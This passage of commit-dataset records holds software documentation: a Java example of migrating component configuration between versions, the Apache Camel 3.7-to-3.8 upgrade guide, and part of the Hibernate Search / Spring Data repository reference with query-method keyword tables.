`MyOutputMigrationHandler`. +\n+\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n public class MyOutputMigrationHandler implements MigrationHandler{ <1>\n\n @Override\n public Map<String, String> migrate(final int incomingVersion, final Map<String, String> incomingData) { <2>\n \/\/ Here we will implement our migration logic to adapt the version 1 of the component to the version 2\n return incomingData;\n }\n }\n----\n+\n<1> The migration handler class needs to implement the `MigrationHandler` interface.\n<2> The `MigrationHandler` interface specifies the `migrate` method. This method references: +\n+\n- the incoming version, which is the version of the configuration that we are migrating from\n- a map (key, value) of the configuration, where the key is the configuration path and the value is the value of the configuration.\n\n=== Implementing the migration handler\n\nNOTE: You need to be familiar with the component configuration path construction to better understand this part.\nRefer to xref:component-configuration.adoc[Defining component layout and configuration].\n\nAs a reminder, the following changes were made since the version 1 of the component:\n\n- The configuration `BasicAuth` from the version 1 is not the root configuration anymore, as it is under `AuthenticationConfiguration`.\n- `AuthenticationConfiguration` is the new root configuration.\n- The component supports a new authentication mode (Oauth2) which is the default mode in the version 2 of the component.\n\nTo migrate the old component version to the new version and to keep backward compatibility, you need to:\n\n- Remap the old configuration to the new one.\n- Give the adequate default values to some options.\n\nIn the case of this scenario, it means making all configurations based on the version 1 of the component have the `authenticationMode` set to basic by default and remapping the old basic authentication configuration to the new one.\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n public class MyOutputMigrationHandler implements MigrationHandler{\n\n @Override\n public Map<String, String> migrate(final int incomingVersion, final Map<String, String> incomingData) {\n if(incomingVersion == 1){ <1>\n \/\/ remapping the old configuration <2>\n String userName = incomingData.get(\"configuration.username\");\n String password = incomingData.get(\"configuration.password\");\n incomingData.put(\"configuration.basic.username\", userName);\n incomingData.put(\"configuration.basic.password\", password);\n\n \/\/ setting default value for authenticationMode to Basic <3>\n incomingData.put(\"configuration.authenticationMode\", \"Basic\");\n }\n\n return incomingData; <4>\n }\n }\n----\n\n<1> Safety check of the incoming data version to make sure to only apply the migration logic to the version 1.\n<2> Mapping the old configuration to the new version structure. As the `BasicAuth` is now under the root configuration class, its path changes and becomes `configuration.basic.*`.\n<3> Setting a new default value to the `authenticationMode` as it needs to be set to `Basic` for configuration coming from version 1.\n<4> Returning the new configuration data.\n\nTIP: if a configuration has been renamed between 2 component versions, you can get the old configuration option from the configuration map by using its old path and set its value using its new path.\n\nYou can now upgrade your component without losing backward compatibility.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c53091b982946f3eb52087bd7f425d886ff62984","subject":"Polished","message":"Polished\n","repos":"cunningt\/camel,pax95\/camel,adessaigne\/camel,apache\/camel,tadayosi\/camel,nikhilvibhav\/camel,tdiesler\/camel,tdiesler\/camel,nikhilvibhav\/camel,christophd\/camel,adessaigne\/camel,cunningt\/camel,pax95\/camel,christophd\/camel,adessaigne\/camel,adessaigne\/camel,tadayosi\/camel,pmoerenhout\/camel,christophd\/camel,nikhilvibhav\/camel,pax95\/camel,apache\/camel,nikhilvibhav\/camel,pmoerenhout\/camel,apache\/camel,christophd\/camel,adessaigne\/camel,apache\/camel,tdiesler\/camel,christophd\/camel,tadayosi\/camel,cunningt\/camel,pmoerenhout\/camel,pax95\/camel,cunningt\/camel,adessaigne\/camel,apache\/camel,tdiesler\/camel,cunningt\/camel,tadayosi\/camel,christophd\/camel,pmoerenhout\/camel,tadayosi\/camel,pmoerenhout\/camel,tdiesler\/camel,pmoerenhout\/camel,cunningt\/camel,tadayosi\/camel,pax95\/camel,pax95\/camel,apache\/camel,tdiesler\/camel","old_file":"docs\/user-manual\/modules\/ROOT\/pages\/camel-3x-upgrade-guide-3_8.adoc","new_file":"docs\/user-manual\/modules\/ROOT\/pages\/camel-3x-upgrade-guide-3_8.adoc","new_contents":"= Apache Camel 3.x Upgrade Guide\n\nThis document is for helping you upgrade your Apache Camel application\nfrom Camel 3.x to 3.y. For example if you are upgrading Camel 3.0 to 3.2, then you should follow the guides\nfrom both 3.0 to 3.1 and 3.1 to 3.2.\n\n== Upgrading Camel 3.7 to 3.8\n\n=== Route startup procedure change\n\nCamel will now initialize all routes during initialization of `CamelContext` itself.\nBefore all routes where lazy initialized when they were started, which happens in the starting phase of `CamelContext`.\nBy moving this forward to initialization phase, we ensure all is done together.\n\nThis means that all the resources used in the routes such as EIPs, processors, beans, components, data formats, languages etc.\nare also initialized. An affect of this change is that any custom Camel component that may do initialization logic in\nthe constructors of `Consumer` or `Producer` should *not* do this, but move this logic to `doInit` or `doStart` where\nsuch logic belongs.\n\n=== API changes\n\nThe following type names are renamed in `CamelEvent.Type` enum:\n\n- `CamelContextRoutesStarting` to `RoutesStarting`\n- `CamelContextRoutesStarted` to `RoutesStarted`\n- `CamelContextRoutesStopping` to `RoutesStopping`\n- `CamelContextRoutesStopped` to `RoutesStopped`\n\nThe method `isOnlyDynamicQueryParameters` was removed from `org.apache.camel.spi.SendDynamicAware` and\n`org.apache.camel.support.component.SendDynamicAwareSupport` classes.\n\nThe class `PackageScanResourceResolver` has been revisited and the method `findResources` now returns a collection of `org.apache.camel.spi.Resource`\nwhich provide both the location of the resolved resources and a method to open the related `InpuStream`:\n\n[source,java]\n----\nCollection<Resource> findResources(String location) throws Exception;\n----\n\n=== OnCompletion EIP\n\nThe `onCompletion` EIP has been fixed. It could trigger multiple completions for a given `Exchange` before.\n\n=== Transactions and Multicast, Splitter, or Recipient List EIPs\n\nWhen using `transacted` in Camel routes with Multicast, Splitter, or Recipient List EIPs, the exection strackframe\ncould grown deep and this could cause a stack overflow exception. This has been fixed by refactoring the EIP into a special\ntransacted mode and the existing reactive mode.\n\nWe do not anticipate any issues but if you are using transactions and these EIPs then we would like to have feedback\nif you encounter any problems with upgrading.\n\n=== camel-jackson\n\nIn the XML DSL `jsonView` has been renamed to `jsonViewTypeName` and made general available in the model\nand for the lightweight `camel-xml-io` route parser.\n\n=== camel-caffeine-lrucache\n\nThis LRUCache implementation is using an algorithm where elements that are removed may not be in strict order, and therefore\nnot ideal for LRU caches assuming ordering.\n\nThe implementation is not needed anymore in Camel 3, as we are using a simpler default implementation internally.\nThis component was deprecated, and has been removed as Maven dependency in `camel-core` pom.xml file.\n\n=== camel-activemq and camel-jms\n\nThe JMS and ActiveMQ components now support the optimized toD EIP pattern by using a single endpoint\/producer for dynamic destination names.\n\n=== camel-sjms and camel-sjms2\n\nThese two components have been overhauled and re-written with the goal of being more feature complete with the Spring JMS component.\nThey no longer uses their own connection pooling, but let you use the existing 3rd party pooling for `ConnectionFactory` which is common practice.\nThe components are now reactive and non-blocking, and support the optimized toD EIP pattern by using a single endpoint\/producer for dynamic destination names.\n\nMany of the previous features and configuration options have been removed\/renamed.\nTo migrate you need to read their documentation and see what options they now offer.\n\n=== camel-aws2-sns\n\nThe policy option now expects a file, since the policy is going to be complex. It can be from classpath:, http: or file: etc.\n\n=== camel-aws2-sqs\n\nThe policy option now expects a file, since the policy is going to be complex. It can be from classpath:, http: or file: etc.\n\n=== camel-github\n\nThe Camel Github Commit consumer has been changed a bit.\n\nFor each exchange now in the body you'll get the commit full message as a String and not the Commit Object like before.\n\nOther information has been stored in headers declared in `GitHubConstants` class:\n\n* GITHUB_COMMIT_AUTHOR - `CamelGitHubCommitAuthor` - The commit Author\n* GITHUB_COMMIT_COMMITTER - `CamelGitHubCommitCommitter` - The committer name\n* GITHUB_COMMIT_SHA - `CamelGitHubCommitSha` - The commit sha\n* GITHUB_COMMIT_URL - `CamelGitHubCommitUrl` - The commit url\n\nThe Camel Github Events consumer has been changed a bit.\n\nFor each exchange now in the body you'll get the event type as a String and not the Event Object like before.\n\nOther information has been stored in headers declared in GitHubConstants class:\n\n* GITHUB_EVENT_PAYLOAD - `CamelGitHubEventPayload` - The event payload\n\n=== camel-infinispan\n\nThere are now two components for Infinispan:\n\n- *camel-infinispan* to integrate with remote caches through the Hot Rod protocol (scheme: *infinispan*).\n- *camel-infinispan-embedded* to integrate with local\/embedded caches (scheme: *infinispan-embedded*).\n\nAs consequence of the refactor:\n\nThe remote and embedded endpoints provide support the same capabilities, as example queries were only possible on a remote cache and now they are supported on both remote and local\/embedded caches.\nThe configuration options for the endpoint are now specific to the context which remove the possibility to mix unrelated properties.\nSome classes have been relocated (such as indempotent and aggregation repositories) have been moved from `org.apache.camel.component.infinispan.processor.*` to `org.apache.camel.component.infinispan.embedded` or `org.apache.camel.component.infinispan.remote`:\n- `org.apache.camel.component.infinispan.embedded.InfinispanEmbeddedAggregationRepository`\n- `org.apache.camel.component.infinispan.embedded.InfinispanEmbeddedIdempotentRepository`\n- `org.apache.camel.component.infinispan.remote.InfinispanRemoteAggregationRepository`\n- `org.apache.camel.component.infinispan.remote.InfinispanRemoteIdempotentRepository`\n\n=== camel-aws\n\nAll the camel-aws components except camel-aws-xray have been deprecated. We suggest migrating to camel-aws2-* components,\nbecause in future releases the AWS components will be removed and with the next LTS release (3.10 probably)\ncamel-aws2 components will be renamed to camel-aws.\n\n\n","old_contents":"= Apache Camel 3.x Upgrade Guide\n\nThis document is for helping you upgrade your Apache Camel application\nfrom Camel 3.x to 3.y. For example if you are upgrading Camel 3.0 to 3.2, then you should follow the guides\nfrom both 3.0 to 3.1 and 3.1 to 3.2.\n\n== Upgrading Camel 3.7 to 3.8\n\n=== Route startup procedure change\n\nCamel will now initialize all routes during initialization of `CamelContext` itself.\nBefore all routes where lazy initialized when they were started, which happens in the starting phase of `CamelContext`.\nBy moving this forward to initialization phase, we ensure all is done together.\n\nThis means that all the resources used in the routes such as EIPs, processors, beans, components, data formats, languages etc.\nare also initialized. An affect of this change is that any custom Camel component that may do initialization logic in\nthe constructors of `Consumer` or `Producer` should *not* do this, but move this logic to `doInit` or `doStart` where\nsuch logic belongs.\n\n=== API changes\n\nThe following type names are renamed in `CamelEvent.Type` enum:\n\n- `CamelContextRoutesStarting` to `RoutesStarting`\n- `CamelContextRoutesStarted` to `RoutesStarted`\n- `CamelContextRoutesStopping` to `RoutesStopping`\n- `CamelContextRoutesStopped` to `RoutesStopped`\n\nThe method `isOnlyDynamicQueryParameters` was removed from `org.apache.camel.spi.SendDynamicAware` and\n`org.apache.camel.support.component.SendDynamicAwareSupport` classes.\n\nThe class `PackageScanResourceResolver` has been revisited and the method `findResources` now returns a collection of `org.apache.camel.spi.Resource`\nwhich provide both the location of the resolved resources and a method to open the related `InpuStream`:\n\n[source,java]\n----\nCollection<Resource> findResources(String location) throws Exception;\n----\n\n=== OnCompletion EIP\n\nThe `onCompletion` EIP has been fixed. It could trigger multiple completions for a given `Exchange` before.\n\n=== Transactions and Multicast, Splitter, or Recipient List EIPs\n\nWhen using `transacted` in Camel routes with Multicast, Splitter, or Recipient List EIPs, the exection strackframe\ncould grown deep and this could cause a stack overflow exception. This has been fixed by refactoring the EIP into a special\ntransacted mode and the existing reactive mode.\n\nWe do not anticipate any issues but if you are using transactions and these EIPs then we would like to have feedback\nif you encounter any problems with upgrading.\n\n=== camel-jackson\n\nIn the XML DSL `jsonView` has been renamed to `jsonViewTypeName` and made general available in the model\nand for the lightweight `camel-xml-io` route parser.\n\n=== camel-caffeine-lrucache\n\nThis LRUCache implementation is using an algorithm where elements that are removed may not be in strict order, and therefore\nnot ideal for LRU caches assuming ordering.\n\nThe implementation is not needed anymore in Camel 3, as we are using a simpler default implementation internally.\nThis component was deprecated, and has been removed as Maven dependency in `camel-core` pom.xml file.\n\n=== camel-activemq and camel-jms\n\nThe JMS and ActiveMQ components now support the optimized toD EIP pattern by using a single endpoint\/producer for dynamic destination names.\n\n=== camel-sjms and camel-sjms2\n\nThese two components have been overhauled and re-written with the goal of being more feature complete with the Spring JMS component.\nThey no longer uses their own connection pooling, but let you use the existing 3rd party pooling for `ConnectionFactory` which is common practice.\nThe components are now reactive and non-blocking, and support the optimized toD EIP pattern by using a single endpoint\/producer for dynamic destination names.\n\nMany of the previous features and configuration options have been removed\/renamed.\nTo migrate you need to read their documentation and see what options they now offer.\n\n=== Camel-AWS2-SNS\n\nThe policy option now expects a file, since the policy is going to be complex. It can be from classpath:, http: or file: etc.\n\n=== Camel-AWS2-SQS\n\nThe policy option now expects a file, since the policy is going to be complex. It can be from classpath:, http: or file: etc.\n\n=== Camel-Github\n\nThe Camel Github Commit consumer has been changed a bit.\n\nFor each exchange now in the body you'll get the commit full message as a String and not the Commit Object like before.\n\nOther information has been stored in headers declared in GitHubConstants class:\n\n* GITHUB_COMMIT_AUTHOR - \"CamelGitHubCommitAuthor\" - The commit Author\n* GITHUB_COMMIT_COMMITTER - \"CamelGitHubCommitCommitter\" - The committer name\n* GITHUB_COMMIT_SHA - \"CamelGitHubCommitSha\" - The commit sha\n* GITHUB_COMMIT_URL - \"CamelGitHubCommitUrl\" - The commit url\n\nThe Camel Github Events consumer has been changed a bit.\n\nFor each exchange now in the body you'll get the event type as a String and not the Event Object like before.\n\nOther information has been stored in headers declared in GitHubConstants class:\n\n* GITHUB_EVENT_PAYLOAD - \"CamelGitHubEventPayload\" - The event payload\n\n=== Camel-infinispan\n\nThere are now two components for Infinispan:\n\n- *camel-infinispan* to integrate with remote caches through the Hot Rod protocol (scheme: *infinispan*).\n- *camel-infinispan-embedded* to integrate with local\/embedded caches (scheme: *infinispan-embedded*).\n\nAs consequence of the refactor:\n\n- the remote and embedded endpoints provide support the same capabilities, as example queries were only possible on a remote cache and now they are suported on both remote and local\/embedded caches\n- the configuration options for the endpoint are now specific to the context which remove the possibility to mix unrelated propertis\n- some classes have been relocated, as example, indempotent and aggregation repositories have been moved from `org.apache.camel.component.infinispan.processor.*` to `org.apache.camel.component.infinispan.embedded` or `org.apache.camel.component.infinispan.remote`:\n+\norg.apache.camel.component.infinispan.embedded.InfinispanEmbeddedAggregationRepository\norg.apache.camel.component.infinispan.embedded.InfinispanEmbeddedIdempotentRepository\norg.apache.camel.component.infinispan.remote.InfinispanRemoteAggregationRepository\norg.apache.camel.component.infinispan.remote.InfinispanRemoteIdempotentRepository\n\n=== Camel-AWS\n\nAll the camel-aws components except camel-aws-xray have been deprecated. We suggest to migrate to Camel-AWS2-* components, because in future releases the AWS components will be removed and with the next LTS release (3.10 probably) camel-aws2 components will be renamed to camel-aws.\n\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c0c65cd590a148d37ef62580db44352aad9e6dc5","subject":"Nowrap.","message":"Nowrap.\n","repos":"alesj\/hs-data-poc","old_file":"documentation\/src\/main\/asciidoc\/reference\/data-hibernatesearch.adoc","new_file":"documentation\/src\/main\/asciidoc\/reference\/data-hibernatesearch.adoc","new_contents":"[[hibernatesearch.jpaextension]]\n= JPA repository extension setup\n\nThis section explains how to set up the Hibernate Search \/ Spring Data integration\nto extend JPA repositories.\n\nWith such a setup, you will be able to add Hibernate Search query methods\n(i.e. methods targeting a full-text index) to JPA repository.\nHow exactly you can add these methods is explained in\n<<hibernatesearch.repository.extending>>.\n\n[[hibernatesearch.jpaextension.dependencies]]\n== Dependencies\n\nAdd a dependency to `me.snowdrop.data:spring-data-hibernate-search-starter-jpa:{version}` in your project.\n\n[[hibernatesearch.jpaextension.configuration]]\n== Configuration\n\n[[hibernatesearch.jpaextension.configuration.annotation]]\n=== Annotation-based configuration\n\nhttps:\/\/docs.spring.io\/spring-data\/jpa\/docs\/current\/reference\/html\/#jpa.introduction[Set up the JPA Spring Data module as usual],\nexcept you need to override the repository factory bean class\nand set it to `me.snowdrop.data.hibernatesearch.orm.repository.support.JpaWithHibernateSearchRepositoryFactoryBean`.\n\n.Hibernate Search extension to JPA repositories using JavaConfig\n====\n[source,java,options=\"nowrap\"]\n----\n@Configuration\n@EnableJpaRepositories(\n basePackages = \"com\/example\/repositories\",\n repositoryFactoryBeanClass = JpaWithHibernateSearchRepositoryFactoryBean.class\n)\npublic class Config {\n}\n----\n====\n\n[[hibernatesearch.jpaextension.configuration.xml]]\n=== XML-based configuration\n\nWARNING: XML-based configuration is not implemented yet.\n\n[[hibernatesearch.jpaextension.configuration.cdi]]\n=== CDI configuration\n\nWARNING: CDI integration is not implemented yet.\n\n[[hibernatesearch.standalone]]\n= Standalone Hibernate Search repository setup\n\nThis section explains how to set up the Hibernate Search \/ Spring Data integration\nas standalone repositories, i.e. in a similar fashion to other Spring Data modules.\n\nWith such a setup, you will be able to create standalone,\nread-only Hibernate Search repositories.\n\n[[hibernatesearch.standalone.dependencies]]\n== Dependencies\n\nWhen using Hibernate Search integrated to Hibernate ORM,\nadd a dependency to `me.snowdrop.data:spring-data-hibernate-search-starter-jpa:{version}` in your project.\n\nWhen using Hibernate Search integrated to Infinispan Query,\nadd a dependency to `me.snowdrop.data:spring-data-hibernate-search-starter-infinispan:{version}` in your project.\n\n[[hibernatesearch.standalone.configuration]]\n== Configuration\n\n[[hibernatesearch.standalone.configuration.annotation]]\n=== Annotation-based configuration\n\nSpring Data Hibernate Search Repositories can be activated using the `@EnableHibernateSearchRepositories` annotation.\n\nApart from `datasourceMapperRef`, this annotation's attributes are standard and defined in\nhttps:\/\/docs.spring.io\/spring-data\/jpa\/docs\/current\/reference\/html\/#repositories.namespace-reference[Spring Data Commons' documentation]\n\nIf no base package is configured, the one the configuration class resides in will be used.\n\nThe configuration is simpler when using Spring Boot's auto-configuration:\n\n.Hibernate Search standalone repositories using JavaConfig when using Spring Boot's auto-configuration\n====\n[source,java,options=\"nowrap\"]\n----\n@Configuration\n@EnableAutoConfiguration\n@EnableHibernateSearchRepositories(basePackages = \"com\/example\/repositories\")\npublic class Config {\n}\n----\n====\n\nIf you do not want to or cannot use auto-configuration for some reason,\nyou will also need to declare additional beans:\nsee <<hibernatesearch.standalone.configuration.advanced>>.\n\n[[hibernatesearch.standalone.configuration.xml]]\n=== XML-based configuration\n\nWARNING: XML-based configuration is not implemented yet.\n\n[[hibernatesearch.standalone.configuration.cdi]]\n=== CDI configuration\n\nWARNING: CDI integration is not implemented yet.\n\n[[hibernatesearch.standalone.configuration.advanced]]\n=== Advanced configuration\n\nIf you don't want to use auto configuration for some reason,\nyou need to add a bean of type `me.snowdrop.data.hibernatesearch.spi.DatasourceMapper` to the context.\nThe Hibernate Search Spring Data module will look for such a bean named `datasourceMapper` by default,\nbut you can customize the bean name using `@EnableHibernateSearchRepositories.datasourceMapperRef`.\n\nWhen using Hibernate Search integrated to Hibernate ORM,\nyou can declare the bean as an instance of `me.snowdrop.data.hibernatesearch.orm.JpaDatasourceMapper`.\nIts constructor expects an `EntityManagerFactory`.\n\nWhen using Hibernate Search integrated to Infinispan Query,\nyou can declare the bean as an instance of `me.snowdrop.data.hibernatesearch.config.infinispan.InfinispanDatasourceMapper`.\nIts constructor expects a `me.snowdrop.data.hibernatesearch.config.infinispan.EntityToCacheMapper`.\n\n[[hibernatesearch.repository]]\n= Repository interfaces\n\n[[hibernatesearch.repository.extending]]\n== JPA repository extension\n\nThis section explains how to add Hibernate Search methods to a JPA repository.\nThis means that, whenever Spring Data implements these methods automatically\n(see <<hibernatesearch.query-methods.derived,derived queries>>, <<hibernatesearch.query-methods.at-query,declared queries>>),\nthey are implemented as Hibernate Search queries (i.e. methods targeting a full-text index)\ninstead of JPA queries.\n\n[NOTE]\n====\nThis feature is only available if you set up\nthe Hibernate Search \/ Spring Data integration to extend JPA repositories:\nsee <<hibernatesearch.jpaextension>>.\n====\n\nIn order to add a Hibernate Search extension to a JPA repository, you need to:\n\n* create an interface extending `me.snowdrop.data.hibernatesearch.repository.extension.RepositoryHibernateSearchExtension<T, ID>`\n* add to this interface the methods that are to be implemented as Hibernate Search queries\n* make the interface of your JPA repository extend this interface\n\n.Extending a JPA repository with Hibernate Search query methods\n====\n[source,java,options=\"nowrap\"]\n----\npublic interface BookRepositoryHibernateSearchExtension extends RepositoryHibernateSearchExtension<Book, String> {\n List<Book> findByName(String name);\n}\n\npublic interface BookRepository extends JpaRepository<Book, String>, BookRepositoryHibernateSearchExtension {\n List<Book> findByPrice(Integer price);\n}\n\npublic class SomeComponent {\n\n @Autowired\n BookRepository bookRepository;\n\n public void doSomething() {\n \/\/ This executes a Hibernate Search query, i.e. a query on the full-text indexes, instead of a JPA query\n List<Book> books = bookRepository.findByName(\"robots dawn\");\n\n \/\/ ... do something with the book list ...\n }\n\n}\n----\n====\n\n[[hibernatesearch.repository.standalone]]\n== Standalone Hibernate Search repository\n\nTo declare repository interfaces, you can extend either the generic `org.springframework.data.repository.Repository<T, ID>` interface\n(if there is no ambiguity as to which Spring Data module should implement the repository)\nor the more specific `me.snowdrop.data.hibernatesearch.repository.HibernateSearchRepository<T, ID>`.\n\n[[hibernatesearch.query-methods]]\n= Query methods\n\n[[hibernatesearch.query-methods.finders]]\n== Query lookup strategies\n\nQueries can be <<hibernatesearch.query-methods.derived,derived from the method name>>,\nor be <<hibernatesearch.query-methods.at-query,defined as strings and assigned to a method>>.\n\nAs with any Spring Data module, you can also implement query methods yourself through\nhttps:\/\/docs.spring.io\/spring-data\/data-commons\/docs\/current\/reference\/html\/#repositories.custom-implementations[custom implementation fragments].\n\n[[hibernatesearch.query-methods.derived]]\n== Derived queries\n\nGenerally the query derivation mechanism for Hibernate Search works as described in\nhttps:\/\/docs.spring.io\/spring-data\/data-commons\/docs\/{springDataVersion}\/reference\/html\/#repositories.query-methods[the Spring Data Commons documentation].\n\nHere's a short example of what a Hibernate Search query method translates into:\n\n.Query creation from method names\n====\n[source,java,options=\"nowrap\"]\n----\npublic interface BookRepository extends Repository<Book, String> {\n List<Book> findByNameAndPrice(String name, Integer price);\n} \n----\n====\n\nThe method name above will be translated into the following call to a Hibernate Search query builder:\n\n[source,java,options=\"nowrap\"]\n----\nQuery query = queryBuilder.bool()\n .must(\n queryBuilder.keyword().onField(\"name\").matching(name).createQuery()\n )\n .must(\n queryBuilder.keyword().onField(\"price\").matching(price).createQuery()\n )\n .createQuery();\n----\n\nA list of supported keywords for Hibernate Search is shown below.\n\n[cols=\"1,2,3\", options=\"header\"]\n.Supported keywords inside method names\n|===\n| Keyword\n| Sample\n| Query builder equivalent\n\n| `Is`\n| `findByName`\n| `queryBuilder.keyword().onField(\"name\").matching(name).createQuery()`\n\n| `And`\n| `findByNameAndPrice`\na|\n[source,java,options=\"nowrap\"]\n----\nqueryBuilder.bool()\n .must(\n queryBuilder.keyword().onField(\"name\").matching(name).createQuery()\n )\n .must(\n queryBuilder.keyword().onField(\"price\").matching(price).createQuery()\n )\n .createQuery();\n----\n\n| `Or`\n| `findByNameOrPrice`\na|\n[source,java,options=\"nowrap\"]\n----\nqueryBuilder.bool()\n .should(\n queryBuilder.keyword().onField(\"name\").matching(name).createQuery()\n )\n .should(\n queryBuilder.keyword().onField(\"price\").matching(price).createQuery()\n )\n .createQuery();\n----\n\n| `Not`\n| `findByNameNot`\na|\n[source,java,options=\"nowrap\"]\n----\nqueryBuilder.bool()\n .must(\n queryBuilder.keyword().onField(\"name\").matching(name).createQuery()\n )\n .not()\n .createQuery();\n----\n\n| `Between`\n| `findByPriceBetween`\n| `queryBuilder.range().onField(\"price\").from(lower).to(upper).createQuery()`\n\n| `LessThan`\n| `findByPriceLessThan`\n| `queryBuilder.range().onField(\"price\").below(upper).excludeLimit().createQuery()`\n\n| `LessThanEqual`\n| `findByPriceLessThanEqual`\n| `queryBuilder.range().onField(\"price\").below(upper).createQuery()`\n\n| `GreaterThan`\n| `findByPriceGreaterThan`\n| `queryBuilder.range().onField(\"price\").above(lower).excludeLimit().createQuery()`\n\n| `GreaterThanEqual`\n| `findByPriceGreaterThanEqual`\n| `queryBuilder.range().onField(\"price\").above(lower).createQuery()`\n\n| `Before`\n| `findByPriceBefore`\n| `queryBuilder.range().onField(\"price\").below(upper).excludeLimit().createQuery()`\n\n| `After`\n| `findByPriceAfter`\n| `queryBuilder.range().onField(\"price\").above(lower).excludeLimit().createQuery()`\n\n| `Like`\n| `findByNameLike`\n| `queryBuilder.keyword().wildcard().onField(\"name\").matching(name + \"*\")`\n\n| `StartingWith`\n| `findByNameStartingWith`\n| `queryBuilder.keyword().wildcard().onField(\"name\").matching(name + \"*\")`\n\n| `EndingWith`\n| `findByNameEndingWith`\n| `queryBuilder.keyword().wildcard().onField(\"name\").matching(\"*\" + name)`\n\n| `Contains\/Containing`\n| `findByNameContaining`\n| `queryBuilder.keyword().wildcard().onField(\"name\").matching(\"*\" + name + \"*\")`\n\n| `In`\n| `findByNameIn(Collection<String>names)`\na|\n[source,java,options=\"nowrap\"]\n----\nqueryBuilder.bool()\n .should(\n queryBuilder.keyword().onField(\"name\").matching(<first element>).createQuery()\n )\n .should(\n queryBuilder.keyword().onField(\"name\").matching(<second element>).createQuery()\n )\n \/\/ ...\n .should(\n queryBuilder.keyword().onField(\"name\").matching(<last element>).createQuery()\n )\n .createQuery();\n----\n\n| `NotIn`\n| `findByNameNotIn(Collection<String>names)`\na|\n[source,java,options=\"nowrap\"]\n----\nqueryBuilder.bool()\n .must(\n queryBuilder.keyword().onField(\"name\").matching(<first element>).createQuery()\n )\n .not()\n .must(\n queryBuilder.keyword().onField(\"name\").matching(<second element>).createQuery()\n )\n .not()\n \/\/ ...\n .must(\n queryBuilder.keyword().onField(\"name\").matching(<last element>).createQuery()\n )\n .not()\n .createQuery();\n----\n\n| `Near`\n| `findByStoreNear`\n| `Not Supported Yet !`\n\n| `True`\n| `findByAvailableTrue`\n| `queryBuilder.keyword().wildcard().onField(\"available\").matching(true)`\n\n| `False`\n| `findByAvailableFalse`\n| `queryBuilder.keyword().wildcard().onField(\"available\").matching(false)`\n\n| `MatchesRegex`\/`Regex`\/`Matches`\n| `findByNameMatchesRegex`\n| `new RegexpQuery(new Term(\"name\", reqexp)`\n\n| `Within`\n| `findByLocationWithin`\n| `queryBuilder.spatial().onField(\"location\").within(distance, Unit.KM).ofLatitude(latitude).andLongitude(longitude).createQuery()`\n\n| `OrderBy`\n| `findByAvailableTrueOrderByNameDesc`\n| `queryBuilder.keyword().wildcard().onField(\"available\").matching(true)` and\n`queryBuilder.sort().byField(\"name\").desc().createSort()`\n|===\n\n[[hibernatesearch.query-methods.fieldnames]]\n=== Targeting specific fields\n\nBy default, derived queries target the default field,\nthe one named after the entity property mentioned in the query method name.\nThat is to say, if your method refers to the property \"name\", the query will target the index field \"name\",\nand will expect that index field to exist.\n\nWhat if you want to target the field \"name_sort\"?\nYou can use the `@me.snowdrop.data.hibernatesearch.annotations.TargetField` annotation.\n\n.Target non-default fields using the `@TargetField` annotation.\n====\n[source,java,options=\"nowrap\"]\n----\npublic interface BookRepository extends HibernateSearchRepository<Book, String> {\n @TargetField(property = \"name\", field = \"name_sort\")\n Page<Book> findByAvailableTrueOrderByNameAsc(String name, Pageable pageable);\n}\n----\n====\n\n[[hibernatesearch.query-methods.at-query]]\n== Using @Query Annotation\n\nQueries can be defined as strings using the `me.snowdrop.data.hibernatesearch.annotations.Query` annotation.\nSuch strings are expected to use the Lucene Query syntax.\n\nThey can be named and defined in a resource file,\nthe location of which is defined when <<hibernatesearch.jpaextension.configuration,configuring>> the Hibernate Search module.\nThen the queries will be assigned to a query method using `@Query(name = \"<the query name>\")`.\n\nAlternatively, the queries can be assigned to the method directly using `@Query(\"<the query>\")`.\n\n.Declare query at the method using the `@Query` annotation.\n====\n[source,java,options=\"nowrap\"]\n----\npublic interface BookRepository extends HibernateSearchRepository<Book, String> {\n @Query(\"+name:?0\")\n Page<Book> findByName(String name, Pageable pageable);\n} \n----\n====\n","old_contents":"[[hibernatesearch.jpaextension]]\n= JPA repository extension setup\n\nThis section explains how to set up the Hibernate Search \/ Spring Data integration\nto extend JPA repositories.\n\nWith such a setup, you will be able to add Hibernate Search query methods\n(i.e. methods targeting a full-text index) to JPA repository.\nHow exactly you can add these methods is explained in\n<<hibernatesearch.repository.extending>>.\n\n[[hibernatesearch.jpaextension.dependencies]]\n== Dependencies\n\nAdd a dependency to `me.snowdrop.data:spring-data-hibernate-search-starter-jpa:{version}` in your project.\n\n[[hibernatesearch.jpaextension.configuration]]\n== Configuration\n\n[[hibernatesearch.jpaextension.configuration.annotation]]\n=== Annotation-based configuration\n\nhttps:\/\/docs.spring.io\/spring-data\/jpa\/docs\/current\/reference\/html\/#jpa.introduction[Set up the JPA Spring Data module as usual],\nexcept you need to override the repository factory bean class\nand set it to `me.snowdrop.data.hibernatesearch.orm.repository.support.JpaWithHibernateSearchRepositoryFactoryBean`.\n\n.Hibernate Search extension to JPA repositories using JavaConfig\n====\n[source,java]\n----\n@Configuration\n@EnableJpaRepositories(\n basePackages = \"com\/example\/repositories\",\n repositoryFactoryBeanClass = JpaWithHibernateSearchRepositoryFactoryBean.class\n)\npublic class Config {\n}\n----\n====\n\n[[hibernatesearch.jpaextension.configuration.xml]]\n=== XML-based configuration\n\nWARNING: XML-based configuration is not implemented yet.\n\n[[hibernatesearch.jpaextension.configuration.cdi]]\n=== CDI configuration\n\nWARNING: CDI integration is not implemented yet.\n\n[[hibernatesearch.standalone]]\n= Standalone Hibernate Search repository setup\n\nThis section explains how to set up the Hibernate Search \/ Spring Data integration\nas standalone repositories, i.e. in a similar fashion to other Spring Data modules.\n\nWith such a setup, you will be able to create standalone,\nread-only Hibernate Search repositories.\n\n[[hibernatesearch.standalone.dependencies]]\n== Dependencies\n\nWhen using Hibernate Search integrated to Hibernate ORM,\nadd a dependency to `me.snowdrop.data:spring-data-hibernate-search-starter-jpa:{version}` in your project.\n\nWhen using Hibernate Search integrated to Infinispan Query,\nadd a dependency to `me.snowdrop.data:spring-data-hibernate-search-starter-infinispan:{version}` in your project.\n\n[[hibernatesearch.standalone.configuration]]\n== Configuration\n\n[[hibernatesearch.standalone.configuration.annotation]]\n=== Annotation-based configuration\n\nSpring Data Hibernate Search Repositories can be activated using the `@EnableHibernateSearchRepositories` annotation.\n\nApart from `datasourceMapperRef`, this 